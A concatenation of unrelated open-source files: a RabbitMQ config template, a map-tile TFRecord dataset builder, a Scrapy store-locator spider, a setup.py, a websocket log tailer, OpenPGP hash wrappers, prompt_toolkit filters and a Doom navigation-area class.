# The RabbitMQ broker port where a single node is used. (port value)
# Minimum value: 0
# Maximum value: 65535
# Deprecated group/name - [DEFAULT]/rabbit_port
#rabbit_port = 5672
# RabbitMQ HA cluster host:port pairs. (list value)
# Deprecated group/name - [DEFAULT]/rabbit_hosts
#rabbit_hosts = $rabbit_host:$rabbit_port
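# Example (illustrative): rabbit_hosts = controller1:5672,controller2:5672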
rabbit_hosts = {{ rabbit_hosts }}
# Connect over SSL for RabbitMQ. (boolean value)
# Deprecated group/name - [DEFAULT]/rabbit_use_ssl
#rabbit_use_ssl = false
# The RabbitMQ userid. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_userid
rabbit_userid = {{ rabbit_userid }}
# The RabbitMQ password. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_password
rabbit_password = {{ rabbit_password }}
# The RabbitMQ login method. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_login_method
#rabbit_login_method = AMQPLAIN
# The RabbitMQ virtual host. (string value)
# Deprecated group/name - [DEFAULT]/rabbit_virtual_host
#rabbit_virtual_host = /
# How frequently to retry connecting with RabbitMQ. (integer value)
#rabbit_retry_interval = 1
# How long to backoff for between retries when connecting to RabbitMQ.
# (integer value)
# Deprecated group/name - [DEFAULT]/rabbit_retry_backoff
#rabbit_retry_backoff = 2
# Maximum interval of RabbitMQ connection retries. Default is 30
# seconds. (integer value)
#rabbit_interval_max = 30
# Maximum number of RabbitMQ connection retries. Default is 0
# (infinite retry count). (integer value)
# Deprecated group/name - [DEFAULT]/rabbit_max_retries
#rabbit_max_retries = 0
# Try to use HA queues in RabbitMQ (x-ha-policy: all). If you change
# this option, you must wipe the RabbitMQ database. In RabbitMQ 3.0,
# queue mirroring is no longer controlled by the x-ha-policy argument
# when declaring a queue. If you just want to make sure that all
# queues (except those with auto-generated names) are mirrored across
# all nodes, run: "rabbitmqctl set_policy HA '^(?!amq\.).*' '{"ha-
# mode": "all"}' " (boolean value)
# Deprecated group/name - [DEFAULT]/rabbit_ha_queues
#rabbit_ha_queues = false
# Positive integer representing duration in seconds for queue TTL
# (x-expires). Queues which are unused for the duration of the TTL are
# automatically deleted. The parameter affects only reply and fanout
# queues. (integer value)
# Minimum value: 1
#rabbit_transient_queues_ttl = 1800
# Specifies the number of messages to prefetch. Setting to zero allows
# unlimited messages. (integer value)
#rabbit_qos_prefetch_count = 0
# Number of seconds after which the Rabbit broker is considered down
# if heartbeat's keep-alive fails (0 disables the heartbeat).
# EXPERIMENTAL (integer value)
#heartbeat_timeout_threshold = 60
# How many times during the heartbeat_timeout_threshold we check the
# heartbeat. (integer value)
#heartbeat_rate = 2
# Deprecated, use rpc_backend=kombu+memory or rpc_backend=fake
# (boolean value)
# Deprecated group/name - [DEFAULT]/fake_rabbit
#fake_rabbit = false
# Maximum number of channels to allow (integer value)
#channel_max = <None>
# The maximum byte size for an AMQP frame (integer value)
#frame_max = <None>
# How often to send heartbeats for consumer's connections (integer
# value)
#heartbeat_interval = 1
# Enable SSL (boolean value)
#ssl = <None>
# Arguments passed to ssl.wrap_socket (dict value)
#ssl_options = <None>
# Set socket timeout in seconds for connection's socket (floating
# point value)
#socket_timeout = 0.25
# Set TCP_USER_TIMEOUT in seconds for connection's socket (floating
# point value)
#tcp_user_timeout = 0.25
# Set delay for reconnection to some host which has connection error
# (floating point value)
#host_connection_reconnect_delay = 0.25
# Maximum number of connections to keep queued. (integer value)
#pool_max_size = 10
# Maximum number of connections to create above `pool_max_size`.
# (integer value)
#pool_max_overflow = 0
# Default number of seconds to wait for a connection to become available
# (integer value)
#pool_timeout = 30
# Lifetime of a connection (since creation) in seconds or None for no
# recycling. Expired connections are closed on acquire. (integer
# value)
#pool_recycle = 600
# Threshold at which inactive (since release) connections are
# considered stale in seconds or None for no staleness. Stale
# connections are closed on acquire. (integer value)
#pool_stale = 60
# Persist notification messages. (boolean value)
#notification_persistence = false
# Exchange name for sending notifications (string value)
#default_notification_exchange = ${control_exchange}_notification
# Max number of not acknowledged message which RabbitMQ can send to
# notification listener. (integer value)
#notification_listener_prefetch_count = 100
# Reconnecting retry count in case of connectivity problem during
# sending notification, -1 means infinite retry. (integer value)
#default_notification_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending notification message (floating point value)
#notification_retry_delay = 0.25
# Time to live for rpc queues without consumers in seconds. (integer
# value)
#rpc_queue_expiration = 60
# Exchange name for sending RPC messages (string value)
#default_rpc_exchange = ${control_exchange}_rpc
# Exchange name for receiving RPC replies (string value)
#rpc_reply_exchange = ${control_exchange}_rpc_reply
# Max number of not acknowledged message which RabbitMQ can send to
# rpc listener. (integer value)
#rpc_listener_prefetch_count = 100
# Max number of not acknowledged message which RabbitMQ can send to
# rpc reply listener. (integer value)
#rpc_reply_listener_prefetch_count = 100
# Reconnecting retry count in case of connectivity problem during
# sending reply. -1 means infinite retry during rpc_timeout (integer
# value)
#rpc_reply_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending reply. (floating point value)
#rpc_reply_retry_delay = 0.25
# Reconnecting retry count in case of connectivity problem during
# sending RPC message, -1 means infinite retry. If the actual retry
# attempt count is not 0, the RPC request could be processed more than
# once. (integer value)
#default_rpc_retry_attempts = -1
# Reconnecting retry delay in case of connectivity problem during
# sending RPC message (floating point value)
#rpc_retry_delay = 0.25
[oslo_concurrency]
lock_path = /var/lib/manila/tmp
""" | mit | 6,409,555,381,335,465,000 | 31.793802 | 90 | 0.75368 | false | 3.569408 | true | false | false |
NARO-41605/pix2pix_map_tiles | DataSetMake_tfwiter.py | 1 | 9657 | # -*- coding: utf-8 -*-
import scipy.io
from PIL import Image
import numpy as np
import random
import scipy.ndimage
from skimage.transform import rotate
import os
import argparse
import requests
from cStringIO import StringIO
import glob
import math
import tensorflow as tf
import json
parser = argparse.ArgumentParser(description='MyScript')
parser.add_argument('images_x_start', type=int)
parser.add_argument('images_x_end', type=int)
parser.add_argument('images_y_start', type=int)
parser.add_argument('images_y_end', type=int)
parser.add_argument('zoom_level', type=int)
parser.add_argument('--inputJson', default="./jsonSample.txt")
parser.add_argument('--outputPath', default="Data")
args = parser.parse_args()
TILE_SIZE = 256
#jsonFile = open(args.inputJson)
#json_dict = json.load(jsonFile)
with open(args.inputJson, 'r') as json_fp:
json_dict = json.loads(json_fp.read(),'utf-8')
print (str(json_dict))
INPUT_URL = json_dict['inputURL']
TARGET_URL = json_dict['targetURL']
OUTPUT_PATH = os.path.join(os.getcwd(),args.outputPath)
if not os.path.isdir(OUTPUT_PATH):
os.makedirs(OUTPUT_PATH)
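# Helpers that wrap raw bytes / ints in tf.train.Feature protos, as expected
# by tf.train.Example when serializing TFRecord files.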
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
#kernel_size = args.kernelSize
kernel_size = 1
input_img_num = len(INPUT_URL)
image_size_x = TILE_SIZE * ((args.images_x_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_x_start - int(kernel_size / 2)) + 1)
image_size_y = TILE_SIZE * ((args.images_y_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_y_start - int(kernel_size / 2)) + 1)
input_img = []
for i in range(input_img_num):
input_img.append(Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0)))
target_img = Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0))
#imgs_num = 1
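# Convert slippy-map tile indices (x, y) at zoom level z to the lon/lat of the
# tile's north-west corner (inverse Web Mercator).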
def tile2latlon(x, y, z):
    lon = (x / 2.0**z) * 360 - 180 # longitude (degrees east)
    mapy = (y / 2.0**z) * 2 * math.pi - math.pi
    lat = 2 * math.atan(math.e ** (- mapy)) * 180 / math.pi - 90 # latitude (degrees north)
return [lon,lat]
def demtofloat(n):
if n == 'e':
return 0
else:
return float(n)
def getTile(req_target, i, j, zoom_level):
input_img_p = Image.new('RGBA', (TILE_SIZE, TILE_SIZE), (0, 0, 0, 0))
error_flg = 0
if req_target['type'] == 'localTile':
path_format = req_target['format']
path_format = path_format.replace('{z}', str(zoom_level))
path_format = path_format.replace('{x}', str(i))
path_format = path_format.replace('{y}', str(j))
input_image_path = os.path.join(req_target['path'], path_format)
if os.path.isfile(input_image_path):
input_img_p = Image.open(input_image_path)
input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
else:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
else:
if req_target['type'] == 'tile':
url_format = req_target['format']
url_format = url_format.replace('{z}', str(zoom_level))
url_format = url_format.replace('{x}', str(i))
url_format = url_format.replace('{y}', str(j))
input_image_url = req_target['url'] + url_format
elif req_target['type'] == 'wms':
start_point = tile2latlon(i, j, zoom_level)
end_point = tile2latlon(i + 1, j + 1, zoom_level)
url_format = req_target['format']
url_format = url_format.replace('{minx}', str(end_point[1]))
url_format = url_format.replace('{miny}', str(start_point[0]))
url_format = url_format.replace('{maxx}', str(start_point[1]))
url_format = url_format.replace('{maxy}', str(end_point[0]))
url_format = url_format.replace('{output_width}', str(TILE_SIZE))
url_format = url_format.replace('{output_height}', str(TILE_SIZE))
input_image_url = req_target['url'] + url_format
print 'input : ' + input_image_url
res = requests.get(input_image_url, verify=False)
if res.status_code == 200:
content_type = res.headers["content-type"]
if 'image' not in content_type:
print("Not image URL : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
resfile = StringIO(res.content)
input_img_p = Image.open(resfile)
input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE))
else:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
error_flg = 1
return input_img_p, error_flg
return input_img_p, error_flg
def dataset_make(images_x_start, images_x_end, images_y_start, images_y_end, zoom_level, imgs_num):
dataset_size_x = TILE_SIZE * (images_x_end - images_x_start + 1)
dataset_size_y = TILE_SIZE * (images_y_end - images_y_start + 1)
dataset_input_img = []
for i in range(input_img_num):
dataset_input_img.append(Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0)))
dataset_target_img = Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0))
error_flg = 0
for i in range(images_x_start, images_x_end + 1):
for j in range(images_y_start, images_y_end + 1):
if not TARGET_URL == None:
input_img_p, error_flg = getTile(TARGET_URL, i, j, zoom_level)
if error_flg == 1:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
return dataset_input_img, dataset_target_img, error_flg
else:
dataset_target_img.paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
for k, req_target in enumerate(INPUT_URL):
input_img_p, error_flg = getTile(req_target, i, j, zoom_level)
if error_flg == 1:
print("Can't get tile : %d - %d - %d" % (zoom_level, i, j))
return dataset_input_img, dataset_target_img, error_flg
else:
dataset_input_img[k].paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE))
print("Get tile : %d - %d - %d" % (zoom_level, i, j))
if error_flg == 0:
input_chNum = 0
for tmpimg in dataset_input_img:
input_chNum += np.asarray(tmpimg).shape[2]
print ('input channel : ' + str(input_chNum))
print ('target channel : ' + str(np.asarray(dataset_target_img).shape[2]))
input_img_np = np.zeros((dataset_size_y, dataset_size_x, input_chNum))
input_chNum = 0
for i, tmpimg in enumerate(dataset_input_img):
tmpimg_np = np.asarray(tmpimg)
for j in range(tmpimg_np.shape[2]):
input_img_np[:, :, input_chNum] = tmpimg_np[:, :, j]
input_chNum += 1
input_array_np = input_img_np/127.5 - 1.0
input_array_np_row = input_array_np.tostring()
dataset_target_img_row = np.array(dataset_target_img).tostring()
writer = tf.python_io.TFRecordWriter(os.path.join(OUTPUT_PATH,
str(imgs_num) + '_' + str(images_x_start + int(kernel_size / 2)) + '_' +
str(images_y_start + int(kernel_size / 2)) + '_' + str(zoom_level) + '.tfrecords'))
example = tf.train.Example(features=tf.train.Features(feature={
'height': _int64_feature(dataset_size_y),
'width': _int64_feature(dataset_size_x),
'input_ch': _int64_feature(input_array_np.shape[2]),
'target_ch': _int64_feature(np.array(dataset_target_img).shape[2]),
'input_raw': _bytes_feature(input_array_np_row),
'target_raw': _bytes_feature(dataset_target_img_row)}))
writer.write(example.SerializeToString())
writer.close()
return dataset_input_img, dataset_target_img, error_flg
imgs_num = 1
for i in range(args.images_x_start, args.images_x_end + 1):
for j in range(args.images_y_start, args.images_y_end + 1):
print "----- input : " + str(imgs_num) + " : " + str(args.zoom_level) + "-" + str(i) + "-" + str(j) + " -----"
input_img_p, target_img_p, error_flg = dataset_make(i - int(kernel_size / 2), i - int(kernel_size / 2) + kernel_size - 1,
j - int(kernel_size / 2), j - int(kernel_size / 2) + kernel_size - 1,
args.zoom_level, imgs_num)
for k in range(input_img_num):
input_img[k].paste(input_img_p[k], ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
target_img.paste(target_img_p, ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE))
if error_flg == 0:
imgs_num += 1
for i in range(input_img_num):
input_img[i].save("input_image%d.png" %(i))
target_img.save("target_image.png" )
print "Make Images : " + str(imgs_num - 1)
| mit | 542,470,002,385,008,260 | 39.521552 | 145 | 0.554656 | false | 3.121517 | false | false | false |
iandees/all-the-places | locations/spiders/thebarrecode.py | 1 | 1853 | # -*- coding: utf-8 -*-
import scrapy
import json
from locations.items import GeojsonPointItem
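# Spider for thebarrecode.com: follows each studio-location link from the
# homepage and yields one GeojsonPointItem per studio page.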
class TheBarreCodeSpider(scrapy.Spider):
name = "thebarrecode"
allowed_domains = ["thebarrecode.com"]
start_urls = (
'http://www.thebarrecode.com/',
)
def parse(self, response):
for location_url in response.xpath('//h4[@class="studio-location-name"]/a[1]/@href').extract():
yield scrapy.Request(
location_url,
callback=self.parse_location,
)
def parse_location(self, response):
properties = {
'addr_full': response.xpath('//h4[@class="studio-address"]/span[@class="street"]/text()').extract_first(),
'city': response.xpath('//h4[@class="studio-address"]/span[@class="city"]/text()').extract_first().replace(', ', ''),
'state': response.xpath('//h4[@class="studio-address"]/span[@class="state"]/text()').extract_first(),
'postcode': response.xpath('//h4[@class="studio-address"]/text()').extract_first(),
'phone': response.xpath('//h4[@class="studio-phone"]/text()').extract_first(),
'name': response.xpath('//h3[@class="studio-location-name"]/text()').extract_first(),
'ref': response.url,
'website': response.url,
}
for key in properties:
if properties[key] and isinstance(properties[key], str):
properties[key] = properties[key].strip()
lat = response.xpath('//div[@class="marker"]/@data-lat').extract_first()
if lat:
lat = float(lat)
properties['lat'] = lat
lon = response.xpath('//div[@class="marker"]/@data-lng').extract_first()
if lon:
lon = float(lon)
properties['lon'] = lon
yield GeojsonPointItem(**properties)
| mit | 1,295,321,280,042,472,000 | 40.177778 | 129 | 0.572045 | false | 3.876569 | false | false | false |
dreikanter/favesdump | setup.py | 1 | 1925 | import codecs
import os
from setuptools import setup, find_packages
import subprocess
LOCAL_PATH = os.path.dirname(os.path.abspath(__file__))
def get_desc():
"""Get long description by converting README file to reStructuredText."""
file_name = os.path.join(LOCAL_PATH, 'README.md')
if not os.path.exists(file_name):
return ''
try:
cmd = "pandoc --from=markdown --to=rst %s" % file_name
stdout = subprocess.STDOUT
output = subprocess.check_output(cmd, shell=True, stderr=stdout)
return output.decode('utf-8')
except subprocess.CalledProcessError:
print('pandoc is required for package distribution but not installed')
return codecs.open(file_name, mode='r', encoding='utf-8').read()
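# Read __version__ directly from favesdump.py so the version is defined in a
# single place.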
def get_version():
with codecs.open(os.path.join(LOCAL_PATH, 'favesdump.py'), 'r') as f:
for line in f:
if line.startswith('__version__ ='):
return line.split('=')[1].strip(' \'"')
setup(
name='favesdump',
description='last.fm faves dumper.',
version=get_version(),
license='MIT',
author='Alex Musayev',
author_email='[email protected]',
url='https://github.com/dreikanter/favesdump',
long_description=get_desc(),
platforms=['any'],
packages=find_packages(),
install_requires=[
'pyyaml',
'requests',
],
entry_points={'console_scripts': ['favesdump = favesdump:main']},
zip_safe=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Archiving :: Backup',
'Topic :: Utilities',
],
dependency_links=[],
)
| mit | 2,421,500,761,861,540,000 | 30.557377 | 78 | 0.611948 | false | 3.819444 | false | false | false |
ski7777/ftcommunity-TXT | board/fischertechnik/TXT/rootfs/var/www/applog.py | 2 | 1596 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
import sys, string, os, time
import asyncio
import websockets
import subprocess
import socket
FILE = "/tmp/app.log"
def notify_launcher(str):
# Create a socket (SOCK_STREAM means a TCP socket)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to server and send data
sock.connect(("localhost", 9000))
sock.sendall(bytes(str + "\n", "UTF-8"))
except socket.error as msg:
pass
finally:
sock.close()
def htmlize(s):
s = s.replace("&", "&")
s = s.replace("<", "<")
s = s.replace(">", ">")
s = s.replace("\n", "<br/>")
return s
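# Websocket handler: tail the shared log file, streaming new lines
# (HTML-escaped) to the client; stop the event loop once the client is gone.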
@asyncio.coroutine
def handler(websocket, path):
with open(FILE, 'r') as fin:
line = fin.readline()
while(websocket.open):
if line:
yield from websocket.send(htmlize(line))
else:
yield from asyncio.sleep(0.01)
line = fin.readline()
asyncio.get_event_loop().stop()
if os.fork():
sys.exit(0)
time.sleep(1)
os.setsid()
# request log file creation from launcher
notify_launcher("logging-start")
# this is the server process which reads the file, monitors
# it for new contents and forwards it to the client
loop = asyncio.get_event_loop()
start_server = websockets.serve(handler, "", 8999)
websocket_server = loop.run_until_complete(start_server)
try:
loop.run_forever()
finally:
websocket_server.close()
loop.run_until_complete(websocket_server.wait_closed())
notify_launcher("logging-stop")
| gpl-3.0 | 241,455,470,784,367,900 | 22.470588 | 60 | 0.625313 | false | 3.447084 | false | false | false |
paulfurley/encryptit | encryptit/hash_algorithms.py | 1 | 2368 | #!/usr/bin/env python3
import hashlib
from .compat import OrderedDict, bytearray_or_str
from .length import Length
def decode_hash_algorithm(octet):
if not isinstance(octet, int) or not 0 <= octet < 256:
raise TypeError('Bad octet value: `{0}` of type `{1}`'.format(
octet, type(octet)))
try:
return BYTE_TO_HASH[octet]
except KeyError:
raise ValueError(
'Unknown hash algorithm `{0}`. See '
'http://tools.ietf.org/html/rfc4880#section-9.4'.format(octet))
class HashAlgorithm():
"""
9.4. Hash Algorithms
http://tools.ietf.org/html/rfc4880#section-9.4
"""
def __init__(self):
raise RuntimeError('HashAlgorithm should not be instantiated')
@classmethod
def new(cls):
return HashWrapper(cls.hash_constructor())
@classmethod
def serialize(cls):
return OrderedDict([
('name', cls.__name__),
('octet_value', HASH_TO_BYTE[cls]),
('digest_length', cls.length),
])
class HashWrapper():
def __init__(self, hash_instance):
self._h = hash_instance
def update(self, data):
return self._h.update(bytearray_or_str(data))
def digest(self):
return bytearray(self._h.digest())
def hexdigest(self):
return self._h.hexdigest()
class MD5(HashAlgorithm):
length = Length(bits=128) # 16 octets
hash_constructor = hashlib.md5
class SHA1(HashAlgorithm):
length = Length(bits=160) # 20 octets
hash_constructor = hashlib.sha1
class RIPEMD160(HashAlgorithm):
length = Length(bits=160) # 20 octets
@staticmethod
def hash_constructor():
return hashlib.new('ripemd160')
class SHA256(HashAlgorithm):
length = Length(bits=256) # 32 octets
hash_constructor = hashlib.sha256
class SHA384(HashAlgorithm):
length = Length(bits=384) # 48 octets
hash_constructor = hashlib.sha384
class SHA512(HashAlgorithm):
length = Length(bits=512) # 64 octets
hash_constructor = hashlib.sha512
class SHA224(HashAlgorithm):
length = Length(bits=224) # 28 octets
hash_constructor = hashlib.sha224
BYTE_TO_HASH = {
1: MD5,
2: SHA1,
3: RIPEMD160,
8: SHA256,
9: SHA384,
10: SHA512,
11: SHA224,
}
HASH_TO_BYTE = dict(
[(v, k) for k, v in BYTE_TO_HASH.items()]
)
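# Example usage (illustrative):
#   algo = decode_hash_algorithm(2)   # -> SHA1
#   h = algo.new()
#   h.update(b'hello')
#   digest = h.hexdigest()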
| agpl-3.0 | -8,021,793,408,460,084,000 | 20.925926 | 75 | 0.622889 | false | 3.52381 | false | false | false |
tequa/ammisoft | ammimain/WinPython-64bit-2.7.13.1Zero/python-2.7.13.amd64/Lib/site-packages/prompt_toolkit/filters/cli.py | 20 | 9224 | """
Filters that accept a `CommandLineInterface` as argument.
"""
from __future__ import unicode_literals
from .base import Filter
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.key_binding.vi_state import InputMode as ViInputMode
from prompt_toolkit.cache import memoized
__all__ = (
'HasArg',
'HasCompletions',
'HasFocus',
'InFocusStack',
'HasSearch',
'HasSelection',
'HasValidationError',
'IsAborting',
'IsDone',
'IsMultiline',
'IsReadOnly',
'IsReturning',
'RendererHeightIsKnown',
'InEditingMode',
# Vi modes.
'ViMode',
'ViNavigationMode',
'ViInsertMode',
'ViInsertMultipleMode',
'ViReplaceMode',
'ViSelectionMode',
'ViWaitingForTextObjectMode',
'ViDigraphMode',
# Emacs modes.
'EmacsMode',
'EmacsInsertMode',
'EmacsSelectionMode',
)
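# Filters compose with the &, | and ~ operators; a key binding is typically
# guarded with an expression such as HasFocus(buffer_name) & ~IsDone()
# (illustrative).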
@memoized()
class HasFocus(Filter):
"""
Enable when this buffer has the focus.
"""
def __init__(self, buffer_name):
self._buffer_name = buffer_name
@property
def buffer_name(self):
" The given buffer name. (Read-only) "
return self._buffer_name
def __call__(self, cli):
return cli.current_buffer_name == self.buffer_name
def __repr__(self):
return 'HasFocus(%r)' % self.buffer_name
@memoized()
class InFocusStack(Filter):
"""
Enable when this buffer appears on the focus stack.
"""
def __init__(self, buffer_name):
self._buffer_name = buffer_name
@property
def buffer_name(self):
" The given buffer name. (Read-only) "
return self._buffer_name
def __call__(self, cli):
return self.buffer_name in cli.buffers.focus_stack
def __repr__(self):
return 'InFocusStack(%r)' % self.buffer_name
@memoized()
class HasSelection(Filter):
"""
Enable when the current buffer has a selection.
"""
def __call__(self, cli):
return bool(cli.current_buffer.selection_state)
def __repr__(self):
return 'HasSelection()'
@memoized()
class HasCompletions(Filter):
"""
Enable when the current buffer has completions.
"""
def __call__(self, cli):
return cli.current_buffer.complete_state is not None
def __repr__(self):
return 'HasCompletions()'
@memoized()
class IsMultiline(Filter):
"""
Enable in multiline mode.
"""
def __call__(self, cli):
return cli.current_buffer.is_multiline()
def __repr__(self):
return 'IsMultiline()'
@memoized()
class IsReadOnly(Filter):
"""
True when the current buffer is read only.
"""
def __call__(self, cli):
return cli.current_buffer.read_only()
def __repr__(self):
return 'IsReadOnly()'
@memoized()
class HasValidationError(Filter):
"""
Current buffer has validation error.
"""
def __call__(self, cli):
return cli.current_buffer.validation_error is not None
def __repr__(self):
return 'HasValidationError()'
@memoized()
class HasArg(Filter):
"""
Enable when the input processor has an 'arg'.
"""
def __call__(self, cli):
return cli.input_processor.arg is not None
def __repr__(self):
return 'HasArg()'
@memoized()
class HasSearch(Filter):
"""
Incremental search is active.
"""
def __call__(self, cli):
return cli.is_searching
def __repr__(self):
return 'HasSearch()'
@memoized()
class IsReturning(Filter):
"""
When a return value has been set.
"""
def __call__(self, cli):
return cli.is_returning
def __repr__(self):
return 'IsReturning()'
@memoized()
class IsAborting(Filter):
"""
True when aborting. (E.g. Control-C pressed.)
"""
def __call__(self, cli):
return cli.is_aborting
def __repr__(self):
return 'IsAborting()'
@memoized()
class IsExiting(Filter):
"""
True when exiting. (E.g. Control-D pressed.)
"""
def __call__(self, cli):
return cli.is_exiting
def __repr__(self):
return 'IsExiting()'
@memoized()
class IsDone(Filter):
"""
True when the CLI is returning, aborting or exiting.
"""
def __call__(self, cli):
return cli.is_done
def __repr__(self):
return 'IsDone()'
@memoized()
class RendererHeightIsKnown(Filter):
"""
    Only True when the renderer knows its real height.
(On VT100 terminals, we have to wait for a CPR response, before we can be
sure of the available height between the cursor position and the bottom of
the terminal. And usually it's nicer to wait with drawing bottom toolbars
until we receive the height, in order to avoid flickering -- first drawing
somewhere in the middle, and then again at the bottom.)
"""
def __call__(self, cli):
return cli.renderer.height_is_known
def __repr__(self):
return 'RendererHeightIsKnown()'
@memoized()
class InEditingMode(Filter):
"""
Check whether a given editing mode is active. (Vi or Emacs.)
"""
def __init__(self, editing_mode):
self._editing_mode = editing_mode
@property
def editing_mode(self):
" The given editing mode. (Read-only) "
return self._editing_mode
def __call__(self, cli):
return cli.editing_mode == self.editing_mode
def __repr__(self):
return 'InEditingMode(%r)' % (self.editing_mode, )
@memoized()
class ViMode(Filter):
def __call__(self, cli):
return cli.editing_mode == EditingMode.VI
def __repr__(self):
return 'ViMode()'
@memoized()
class ViNavigationMode(Filter):
"""
Active when the set for Vi navigation key bindings are active.
"""
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state):
return False
return (cli.vi_state.input_mode == ViInputMode.NAVIGATION or
cli.current_buffer.read_only())
def __repr__(self):
return 'ViNavigationMode()'
@memoized()
class ViInsertMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.INSERT
def __repr__(self):
        return 'ViInsertMode()'
@memoized()
class ViInsertMultipleMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.INSERT_MULTIPLE
def __repr__(self):
return 'ViInsertMultipleMode()'
@memoized()
class ViReplaceMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.VI
or cli.vi_state.operator_func
or cli.vi_state.waiting_for_digraph
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return cli.vi_state.input_mode == ViInputMode.REPLACE
def __repr__(self):
return 'ViReplaceMode()'
@memoized()
class ViSelectionMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return bool(cli.current_buffer.selection_state)
def __repr__(self):
return 'ViSelectionMode()'
@memoized()
class ViWaitingForTextObjectMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return cli.vi_state.operator_func is not None
def __repr__(self):
return 'ViWaitingForTextObjectMode()'
@memoized()
class ViDigraphMode(Filter):
def __call__(self, cli):
if cli.editing_mode != EditingMode.VI:
return False
return cli.vi_state.waiting_for_digraph
def __repr__(self):
return 'ViDigraphMode()'
@memoized()
class EmacsMode(Filter):
" When the Emacs bindings are active. "
def __call__(self, cli):
return cli.editing_mode == EditingMode.EMACS
def __repr__(self):
return 'EmacsMode()'
@memoized()
class EmacsInsertMode(Filter):
def __call__(self, cli):
if (cli.editing_mode != EditingMode.EMACS
or cli.current_buffer.selection_state
or cli.current_buffer.read_only()):
return False
return True
def __repr__(self):
return 'EmacsInsertMode()'
@memoized()
class EmacsSelectionMode(Filter):
def __call__(self, cli):
return (cli.editing_mode == EditingMode.EMACS
and cli.current_buffer.selection_state)
def __repr__(self):
return 'EmacsSelectionMode()'
| bsd-3-clause | 5,422,360,678,701,781,000 | 22.351899 | 78 | 0.602125 | false | 3.830565 | false | false | false |
GitExl/DoomPath | src/nav/area.py | 1 | 2673 | from util.rectangle import Rectangle
class Area(object):
"""
A navigation area.
This describes a rectangle in which movement is freely possible. Connections to other
navigation areas allow pathfinding throughout a map.
"""
__slots__ = (
'rect',
'z',
'sector',
'flags',
'plane',
'connections',
'elements',
'inside_rect',
'index',
'path',
'visited'
)
# Sides of a navigation area.
SIDE_TOP = 0
SIDE_RIGHT = 1
SIDE_BOTTOM = 2
SIDE_LEFT = 3
SIDE_RANGE = [SIDE_TOP, SIDE_RIGHT, SIDE_BOTTOM, SIDE_LEFT]
SIDE_RANGE_OPPOSITE = [SIDE_BOTTOM, SIDE_LEFT, SIDE_TOP, SIDE_RIGHT]
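    # SIDE_RANGE_OPPOSITE[side] gives the side facing `side`:
    # top <-> bottom, left <-> right.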
def __init__(self, x1, y1, x2, y2, z):
# Position and size.
self.rect = Rectangle(x1, y1, x2, y2)
# Average Z location of this area. If the area has a slope, this
# should not be used.
self.z = z
# Can refer to a sector index to which this navigation area is linked. If the
# sector's floor or ceiling moves, this area will need to be updated along with it.
self.sector = None
# Flags, taken from a NavElement object.
self.flags = 0
# A plane describing the surface of this area.
self.plane = None
# Connection objects leading into other navigation areas.
self.connections = []
# For internal use, to track elements belonging to this area.
self.elements = []
self.inside_rect = Rectangle()
self.index = -1
self.path = False
self.visited = False
def get_side(self, side):
"""
Returns the start and end coordinates of a side of this area.
"""
if side == Area.SIDE_TOP:
return self.rect.left, self.rect.top, self.rect.right, self.rect.top
elif side == Area.SIDE_RIGHT:
return self.rect.right, self.rect.top, self.rect.right, self.rect.bottom
elif side == Area.SIDE_BOTTOM:
return self.rect.left, self.rect.bottom, self.rect.right, self.rect.bottom
elif side == Area.SIDE_LEFT:
return self.rect.left, self.rect.top, self.rect.left, self.rect.bottom
return None
def __repr__(self):
return 'area {}, z {}, sector {}, width {}, height {}, plane {}, flags {}, connections {}'.format(self.rect, self.z, self.sector, self.rect.get_width(), self.rect.get_height(), self.plane, self.flags, len(self.connections)) | bsd-2-clause | -7,160,699,094,409,025,000 | 29.386364 | 232 | 0.555556 | false | 3.995516 | false | false | false |
